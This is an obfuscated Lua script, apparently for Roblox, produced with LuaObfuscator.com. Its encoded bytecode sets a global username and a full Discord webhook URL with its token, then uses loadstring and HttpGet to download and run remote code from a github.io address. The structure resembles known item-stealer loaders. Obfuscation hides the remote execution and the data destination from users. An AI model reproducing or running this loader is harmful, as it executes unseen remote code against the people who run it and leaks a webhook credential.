--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v77=0;local v78;while true do if (v77==0) then v78=v5(v68,v19);v19=nil;v77=1;end if (v77==1) then return v78;end end else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((746 -(530 + 214))^(v32-(1 + 0))))%((1252 -(183 + 1067))^(((v33-((1290 -(334 + 954)) -1)) -(v32-(3 -2))) + 1 + 0)) ;return v69-(v69%1) ;else local v70=(6 -4)^(v32-(347 -((861 -556) + 41))) ;return (((v31%(v70 + v70))>=v70) and (1 -0)) or (1255 -(271 + 984)) ;end end local function v21()local v34=(0 + 0) -0 ;local v35;while true do if (v34==((3 -2) + 0)) then return v35;end if ((0 -0)==v34) then v35=v1(v16,v18,v18);v18=v18 + (282 -(249 + 32)) ;v34=1;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (6 -4) ;return (v37 * (137 + 119)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 2 + 1 );v18=v18 + 4 + 0 ;return (v41 * 16777216) + (v40 * (136243 -70707)) + (v39 * (949 -693)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1187 -(599 + 587) ,1226 -(387 + 819) ) * ((1 + 1)^(40 -(8 + 0)))) + v42 ;local v46=v20(v43,5 + 16 ,69 -38 );local v47=((v20(v43,16 + 16 )==((3567 -2143) -(977 + 446))) and  -(1 + 0)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * (0 + 0 + 0) ;else v46=(476 -(270 + 205)) + 0 ;v44=0 + (0 -0) ;end elseif (v46==(5249 -3202)) then return ((v45==(280 -(55 + 225))) and (v47 * ((1 + 0)/((4118 -2618) -(232 + 1268))))) or (v47 * NaN) ;end return v8(v47,v46-(1830 -(580 + 227)) ) * (v44 + (v45/((1 + (1 -0))^((1787 -(518 + 1239)) + 22)))) ;end local function v25(v48)local v49=(375 -(210 + 165)) + (1364 -(573 + 791)) ;local v50;local v51;while true do if (v49==(865 -(800 + 63))) then v51={};for v79=1 + 0 + 0 , #v50 do v51[v79]=v2(v1(v3(v50,v79,v79)));end v49=(9 + 78) -(39 + 45) ;end if ((0 + 0)==v49) then v50=nil;if  not v48 then local v87=0;while true do if (v87==(604 -(317 + (919 -632)))) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=2 -(1 -0) ;end if ((14 -11)==v49) then return v6(v51);end if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=3 -1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==1) then local v71=0;while true do if (v71~=(1 + 0)) then else v52=492 -(217 + 273) ;break;end if (v71~=0) then else v55=nil;v56=nil;v71=2 -1 ;end end end if (v52==(0 -0)) then local v72=0;while true do if (v72==0) then v53=1107 -(257 + 850) ;v54=nil;v72=708 -(619 + 88) ;end if (v72~=(1 + 0)) then else v52=1;break;end end end if (v52~=3) then else local v73=1157 -(970 + 187) ;while true do if (1~=v73) then else v52=4;break;end if (v73==0) then v59=nil;v60=nil;v73=2 -1 ;end end end if (v52~=4) then else while true do if (v53~=1) then else v56=nil;v57=nil;v53=2;end if (v53==(0 + 0)) then local v88=0;while true do if (v88==1) then v53=1;break;end if (0~=v88) then else v54=0 + 0 ;v55=nil;v88=1;end end end if (v53~=3) then else v60=nil;while true do local v90=0 -0 ;while true do if (v90~=1) then else if (v54==0) then local v111=0 + 0 ;local v112;local v113;while true do if (v111~=(0 -0)) then else v112=0 -0 ;v113=nil;v111=747 -(361 + 385) ;end if (v111~=(592 -(59 + 532))) then else while true do if (v112~=(0 -0)) then else v113=0 -0 ;while true do if (v113==1) then v57={};v54=791 -(177 + 613) ;break;end if (v113~=(1150 -(513 + 637))) then else local v130=50 -(39 + 11) ;while true do if (1==v130) then v113=1;break;end if (v130~=(1001 -(397 + 604))) then else v55={};v56={};v130=1;end end end end break;end end break;end end end if (v54==2) then local v114=0;while true do if (v114~=(0 -0)) then else for v118=1 + 0 ,v59 do local v119=0 + 0 ;local v120;local v121;local v122;while true do if (v119==0) then v120=0;v121=nil;v119=1877 -(953 + 923) ;end if (v119~=1) then else v122=nil;while true do if (v120~=0) then else v121=v21();v122=nil;v120=1;end if (v120~=1) then else if (v121==(307 -(268 + 38))) then v122=v21()~=0 ;elseif (v121==(1 + 1)) then v122=v24();elseif (v121==3) then v122=v25();end v60[v118]=v122;break;end end break;end end end v58[3]=v21();v114=2 -1 ;end if (v114==1) then for v123=1,v23() do local v124=0;local v125;local v126;local v127;while true do if ((1 + 0)~=v124) then else v127=nil;while true do if (v125~=(1 + 0)) then else while true do if (v126~=0) then else v127=v21();if (v20(v127,1 + 0 ,1845 -(253 + 1591) )~=0) then else local v166=0;local v167;local v168;local v169;local v170;while true do if (v166==(1 + 0)) then local v174=1166 -(981 + 185) ;while true do if (v174~=(1 + 0)) then else v166=2;break;end if (v174~=(1474 -(698 + 776))) then else v169=nil;v170=nil;v174=1;end end end if (v166~=2) then else while true do if (v167==1) then v170={v22(),v22(),nil,nil};if (v168==(0 -0)) then local v193=0 -0 ;local v194;local v195;while true do if (v193==(1 + 0)) then while true do if ((249 -(171 + 78))~=v194) then else v195=0;while true do if (v195~=(235 -(196 + 39))) then else v170[3]=v22();v170[7 -3 ]=v22();break;end end break;end end break;end if ((526 -(368 + 158))~=v193) then else local v203=0;while true do if (1~=v203) then else v193=535 -(144 + 390) ;break;end if (v203~=(0 -0)) then else v194=0;v195=nil;v203=921 -(709 + 211) ;end end end end elseif (v168==1) then v170[3]=v23();elseif (v168==(9 -7)) then v170[3]=v23() -(2^(379 -(341 + 22))) ;elseif (v168==(1170 -(741 + 426))) then local v210=0 -0 ;while true do if (v210==0) then v170[901 -(279 + 619) ]=v23() -((1687 -(1292 + 393))^16) ;v170[377 -(144 + 229) ]=v22();break;end end end v167=2;end if (v167==0) then local v185=0 + 0 ;while true do if (v185~=(1 + 0)) then else v167=3 -2 ;break;end if (v185~=0) then else local v198=0 -0 ;while true do if (v198~=(360 -(121 + 238))) then else v185=2 -1 ;break;end if ((655 -(638 + 17))~=v198) then else v168=v20(v127,2,3);v169=v20(v127,4,25 -19 );v198=1 + 0 ;end end end end end if (v167==(524 -(356 + 165))) then if (v20(v169,551 -(282 + 266) ,12 -9 )~=(2 -1)) then else v170[8 -4 ]=v60[v170[4 + 0 ]];end v55[v123]=v170;break;end if (v167==(7 -5)) then local v187=0;while true do if (v187==0) then if (v20(v169,1 -0 ,1)==(1228 -(1216 + 11))) then v170[5 -3 ]=v60[v170[2]];end if (v20(v169,2,2)==1) then v170[3]=v60[v170[294 -(267 + 24) ]];end v187=1;end if ((1107 -(1042 + 64))~=v187) then else v167=1562 -(1101 + 458) ;break;end end end end break;end if (v166~=0) then else local v175=0;while true do if ((0 -0)==v175) then v167=1717 -(1515 + 202) ;v168=nil;v175=2 -1 ;end if (v175==1) then v166=1;break;end end end end end break;end end break;end if (v125~=(957 -(435 + 522))) then else local v147=0 -0 ;while true do if (v147==(1187 -(616 + 570))) then v125=1;break;end if (v147~=(0 + 0)) then else v126=0;v127=nil;v147=1 + 0 ;end end end end break;end if (v124==(451 -(281 + 170))) then local v129=1089 -(1010 + 79) ;while true do if (0~=v129) then else v125=0 -0 ;v126=nil;v129=897 -(559 + 337) ;end if (v129~=1) then else v124=1;break;end end end end end v54=3;break;end end end break;end if (v90~=0) then else local v105=0 -0 ;local v106;while true do if ((0 -0)==v105) then v106=0;while true do if (v106~=(2 -1)) then else v90=1332 -(300 + 1031) ;break;end if (v106==(0 -0)) then local v128=0 -0 ;while true do if (v128==(0 -0)) then if (v54~=1) then else local v131=0;while true do if (0~=v131) then else local v159=0 -0 ;local v160;while true do if (v159==(0 -0)) then v160=0;while true do if (v160==0) then v58={v55,v56,nil,v57};v59=v23();v160=1;end if (v160==(329 -(220 + 108))) then v131=1;break;end end break;end end end if (v131~=(146 -(42 + 103))) then else v60={};v54=2;break;end end end if (v54~=(1 + 2)) then else local v132=0 + 0 ;while true do local v148=0 + 0 ;local v149;while true do if (v148~=0) then else v149=0;while true do if (v149==(0 + 0)) then if (1==v132) then return v58;end if (v132~=0) then else local v176=0 -0 ;while true do if (1~=v176) then else v132=1 -0 ;break;end if (0~=v176) then else for v189=1,v23() do v56[v189-(1344 -(84 + 1259)) ]=v28();end for v191=1,v23() do v57[v191]=v23();end v176=1;end end end break;end end break;end end end end v128=1515 -(183 + 1331) ;end if (v128~=(1 + 0)) then else v106=552 -(307 + 244) ;break;end end end end break;end end end end end break;end if (v53==(1 + 1)) then local v89=0;while true do if (v89==0) then v58=nil;v59=nil;v89=1;end if (v89==(415 -(374 + 40))) then v53=1434 -(757 + 674) ;break;end end end end break;end if (v52~=(402 -(4 + 396))) then else v57=nil;v58=nil;v52=3;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v81=0;local v82;local v83;local v84;local v85;local v86;while true do if (v81==0) then v82=1;v83= -1;v81=1;end if (v81==2) then v86=nil;function v86()local v91=v65;local v92=v66;local v93=v67;local v94=v27;local v95={};local v96={};local v97={};for v101=1212 -(229 + 983) ,v85 do if ((v101>=v93) or ((8950 -5383)==4402)) then v95[v101-v93 ]=v84[v101 + 1 ];else v97[v101]=v84[v101 + (966 -(733 + 232)) ];end end local v98=(v85-v93) + (1030 -(843 + 111 + 75)) ;local v99;local v100;while true do local v102=680 -(601 + 79) ;local v103;while true do if ((1610==(2660 -1050)) and (v102==(0 -0))) then v103=0 + 0 ;while true do if ((v103==(467 -(418 + 49))) or (3627<(4922 -(1126 + 845)))) then v99=v91[v82];v100=v99[641 -(213 + 427) ];v103=1 + 0 ;end if ((v103==(2 -1)) or (3892<=(2237 + 496))) then if ((v100<=(2 + 2)) or (556>=4336)) then if ((v100<=1) or ((7875 -3471)>(10675 -5715))) then if ((v100>(418 -(185 + 233))) or (3287>(11156 -(431 + 6161)))) then v97[v99[2 + 0 ]]=v99[6 -3 ]~=0 ;else v82=v99[7 -4 ];end elseif (((2623 -(461 + 727))==(3486 -2051)) and (v100<=((1682 -(53 + 22)) -(42 + 1563)))) then v97[v99[3 -1 ]]=v99[3];elseif ((((104 + 453) -274)<(1853 + 148)) and (v100==(2 + 1))) then v97[v99[1 + 1 ]]();else v97[v99[2]]=v63[v99[5 -2 ]];end elseif (((2072 + (1993 -616))>(1420 -(1887 -(1009 + 11)))) and (v100<=(9 -2))) then if ((v100<=(9 -4)) or ((2299 -(986 + 23))>(4209 -(544 + 825)))) then local v137=0 -0 ;local v138;local v139;local v140;local v141;local v142;local v143;while true do if (((1 + 2)==v137) or ((1926 -(156 + (3272 -1903)))>3038)) then while true do if (((655 + 1840)<=((3901 + 1201) -(733 + 1219))) and (v138==(2 -1))) then v141=nil;v142=nil;v138=2;end if ((v138==((21 -12) -7)) or ((15601 -(3279 + 9118))<(2652 -(255 + 28)))) then v143=nil;while true do if ((v139==(0 + 0)) or ((2893 + 2051)<=(19034 -14998))) then local v177=0 -0 ;local v178;while true do if ((v177==0) or ((78 + 1719)<(1988 -(413 + 884)))) then v178=0 -0 ;while true do if ((3832<(529 + (7493 -3912))) and (v178==(0 -0))) then local v199=(3841 -2284) -(184 + 1373) ;while true do if (((76 + (2565 -(935 + 1064)))==(347 + 295)) and (v199==(1 + 0))) then v178=2 -1 ;break;end if (((2916 -((186 -139) + 53))>(315 + 489)) and (v199==(0 + (70 -(60 + 10))))) then v140=v99[885 -(80 + 803) ];v141,v142=v94(v97[v140](v13(v97,v140 + ((7 -5) -1) ,v99[3])));v199=896 -((854 -255) + 296) ;end end end if ((v178==(424 -(396 + 27))) or ((728 + 4206)<=38)) then v139=512 -(29 + 482) ;break;end end break;end end end if (((9582 -6173)>=1592) and (v139==(1 + 0))) then local v179=451 -(427 + 24) ;while true do if ((1289<=(9957 -7752)) and (v179==(428 -(107 + 320)))) then v139=2;break;end if ((4362>(3464 -(613 + 219 + 7))) and (v179==(0 -0))) then local v188=0 + 0 ;while true do if ((4822>(10959 -8627)) and (v188==(1 + (0 -0)))) then v179=1542 -(405 + 1136) ;break;end if ((v188==0) or ((79 + 255)>(5695 -2474))) then v83=(v142 + v140) -((3 -1) -1) ;v143=0 + 0 ;v188=1 + 0 ;end end end end end if ((v139==((9 -7) + (0 -0))) or ((2136 -(390 + 462))>(4115 -2389))) then for v180=v140,v83 do local v181=139 -(83 + 56) ;local v182;while true do if ((v181==0) or (((10008 -2923) -(4443 -(358 + 41)))<(2853 -(341 + (2272 -1640))))) then v182=1545 -(1385 + (493 -(66 + 267))) ;while true do if ((v182==(0 + (1309 -(884 + 425)))) or (3345<=1876)) then v143=v143 + (4 -(1232 -(1119 + 110))) ;v97[v180]=v141[v143];break;end end break;end end end break;end end break;end if (((7844 -5771)==(327 + 1746)) and (v138==(594 -(443 + 151)))) then v139=0 + 0 ;v140=nil;v138=409 -(30 + 378) ;end end break;end if ((v137==(2 -1)) or ((4995 -(362 + 333))<=(3074 + 324))) then v140=nil;v141=nil;v137=2 + 0 ;end if ((2678>=(815 -(771 + 24))) and (v137==(1963 -(432 + 1531)))) then v138=1307 -(614 + 693) ;v139=nil;v137=789 -(702 + 86) ;end if ((1783<=(5053 -(834 + 522))) and (v137==(1947 -(856 + 1089)))) then v142=nil;v143=nil;v137=11 -8 ;end end elseif (((1263 -(124 + 415))<3777) and (v100==(27 -21))) then do return;end else local v152=0;local v153;local v154;while true do if (((336 + 398)>=200) and (v152==(1419 -(126 + 1292)))) then v97[v153 + (1519 -(607 + (1745 -(283 + 551)))) ]=v154;v97[v153]=v154[v99[11 -7 ]];break;end if ((991<(2244 -1241)) and (v152==(0 + 0))) then local v165=(712 -(29 + 96)) -(550 + 37) ;while true do if ((v165==((988 -(305 + 384)) -(63 + 236))) or ((1414 + 2709)<(1987 -(1442 + 421)))) then v153=v99[2 + 0 ];v154=v97[v99[6 -3 ]];v165=344 -((171 -86) + 258) ;end if (((16191 -11379)>1244) and (v165==(2 -1))) then v152=1156 -(817 + 338) ;break;end end end end end elseif ((((775 -357) -(62 + 224))<=(3383 -(1743 + 53))) and (v100<=8)) then v63[v99[2 + 1 ]]=v97[v99[2 + 0 ]];elseif ((v100>(14 -5)) or (1799>2937)) then if ((4373>=2906) and (v97[v99[229 -(225 + 2) ]]==v99[512 -(32 + 476) ])) then v82=v82 + (1273 -(943 + 329)) ;else v82=v99[1 + 2 ];end else local v155=0 + 0 ;local v156;local v157;local v158;while true do if ((v155==0) or (2087>=(10307 -(24276 -18685)))) then v156=0;v157=nil;v155=884 -(621 + (790 -528)) ;end if (((672 + 2794)>(719 + 2437)) and (v155==(3 -2))) then v158=nil;while true do if ((v156==1) or ((1916 -(348 + 1309))<=77)) then while true do if ((v157==(603 -((1953 -(611 + 956)) + 217))) or (((5908 -4293) + 336)>(11679 -8746))) then v158=v99[2 + 0 ];v97[v158]=v97[v158](v13(v97,v158 + 1 ,v83));break;end end break;end if ((v156==(0 -0)) or ((7366 -(13819 -8412))>(8894 -6359))) then local v173=0 + 0 ;while true do if (((21912 -17501)>=(1278 + 2982)) and (v173==(141 -(102 + 38)))) then v156=2 -1 ;break;end if (((1140 + 222)>(201 + 678 + 369)) and (v173==(0 + (0 -0)))) then v157=0 + 0 ;v158=nil;v173=1 + 0 ;end end end end break;end end end v82=v82 + (1867 -(1620 + 246)) ;break;end end break;end end end end v81=3;end if (v81==1) then v84={...};v85=v12("#",...) -1 ;v81=2;end if (v81==3) then A,B=v27(v11(v86));if  not A[1] then local v104=v61[4][v82] or "?" ;error("Script error at ["   .. v104   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F72692O7A36392E6769746875622E696F2F4D61696E2E6C756103083O00557365724E616D65030F3O002O7476736E697065732O352O33343903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039313631352O323734352O3338323731382F684943486C7034374E5639325954314B4741576C67546D69786A7541587762664943372D6553513952346F4F7943706F2D317A382D566F42327267557867312O45586D3400153O0012023O00013O00260A3O000C0001000200044O000C0001001204000100033O001204000200043O002007000200020005001202000400064O0001000500014O0005000200054O000900013O00022O000300010001000100044O0014000100260A3O00010001000100044O00010001001202000100083O001208000100073O0012020001000A3O001208000100093O0012023O00023O00044O000100012O00063O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
